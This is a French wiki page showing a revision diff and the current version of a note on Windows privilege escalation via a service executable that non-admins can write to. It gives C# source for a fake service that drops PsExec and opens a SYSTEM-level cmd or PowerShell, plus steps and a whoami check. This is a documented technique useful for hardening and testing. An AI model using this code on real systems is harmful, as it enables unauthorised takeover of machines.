« Privilege escalation » : différence entre les versions

De Banane Atomic
Aller à la navigationAller à la recherche
Ligne 3 : Ligne 3 :
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.


<filebox fn='Program.cs'>
<filebox fn='FakeService.cs'>
class Program
public class FakeService : ServiceBase
{
{
     static void Main(string[] args)
     protected override void OnStart(string[] args)
    {
        Thread.Sleep(10000);  // wait 10s for the user to log and Windows to start
 
        var psExecPath = ExtractPsExec();  // extract the PsExec.exe file
        var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";
 
        // Windows services run in session 0 and user account runs in session 1.
        // use sysinternals' PsExec to run cmd.exe in session 1.
        Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
    }
 
    private string ExtractPsExec()
     {
     {
         ServiceBase.Run(new ServiceBase[] { new Service() });
         var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe"); // temp path: C:\Windows\Temp
 
        if (!File.Exists(psExecPath))
            File.WriteAllBytes(psExecPath, Resources.PsExec64);
 
        return psExecPath;
     }
     }
}
}
</filebox>


public class Service : ServiceBase
<filebox fn='Program.cs'>
class Program
{
{
     protected override void OnStart(string[] args)
     static void Main(string[] args)
     {
     {
         Thread.Sleep(60000);
         ServiceBase.Run(new ServiceBase[] { new FakeService() });
        // Windows services run in session 0 and user account runs in session 1.
        // use sysinternals' PsExec to run cmd.exe in session 1.
        Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe");
     }
     }
}
}

Version du 20 février 2022 à 15:56

With a writable Windows service

If the executable of a Windows service is writable by non-admin users, you can replace it with another executable that will launch a command prompt in the system account.

FakeService.cs 
public class FakeService : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        Thread.Sleep(10000);  // wait 10s for the user to log and Windows to start

        var psExecPath = ExtractPsExec();  // extract the PsExec.exe file
        var powershellPath = @"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe";

        // Windows services run in session 0 and user account runs in session 1.
        // use sysinternals' PsExec to run cmd.exe in session 1.
        Process.Start(psExecPath, $"-accepteula -d -i 1 {powershellPath}");
    }

    private string ExtractPsExec()
    {
        var psExecPath = Path.Combine(Path.GetTempPath(), "PsExec64.exe"); // temp path: C:\Windows\Temp

        if (!File.Exists(psExecPath))
            File.WriteAllBytes(psExecPath, Resources.PsExec64);

        return psExecPath;
    }
}
Program.cs 
class Program
{
    static void Main(string[] args)
    {
        ServiceBase.Run(new ServiceBase[] { new FakeService() });
    }
}
  1. Replace the executable of the Windows service by the compiled application.
  2. A command prompt will be launched when the Windows service starts.
Dos.svg 
whoami
REM nt authority\system
Récupérée de « http://wiki.bananeatomic.fr/index.php?title=Privilege_escalation&oldid=26835 »